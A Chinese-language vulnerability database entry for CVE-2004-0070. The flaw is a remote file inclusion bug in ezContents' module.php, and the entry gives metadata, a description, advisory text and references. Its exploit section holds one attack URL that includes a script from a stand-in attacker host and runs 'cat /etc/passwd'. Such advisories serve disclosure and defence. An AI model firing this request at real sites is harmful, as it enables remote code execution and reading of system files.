VisualShapers EZContents module.php远程命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107624 漏洞类型 未知
发布时间 2004-01-10 更新时间 2006-11-02
CVE编号 CVE-2004-0070 CNNVD-ID CNNVD-200402-063
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23537
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200402-063
|漏洞详情
VisualShapersezContents是一款基于PHP和MYSQL的WEB站点内容管理系统。VisualShapersezContents包含的module.php脚本对外部提交输入缺少充分过滤,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。'module.php'模块对'link'变量的数据缺少充分检查,攻击者可以提交远程服务器上的恶意PHP脚本作为包含文件,以WEB进程权限执行包含在脚本中的任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/9396/info

A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems.

http://www.example.com/module.php?link=http://attacker.example.com/index.php&cmd=cat /etc/passwd
|参考资料

来源:XF
名称:ezcontents-php-file-include(14199)
链接:http://xforce.iss.net/xforce/xfdb/14199
来源:BID
名称:9396
链接:http://www.securityfocus.com/bid/9396
来源:OSVDB
名称:6878
链接:http://www.osvdb.org/6878
来源:www.ezcontents.org
链接:http://www.ezcontents.org/forum/viewtopic.php?t=361
来源:BUGTRAQ
名称:20040110RemoteCodeExecutioninezContents
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107392588915627&w=2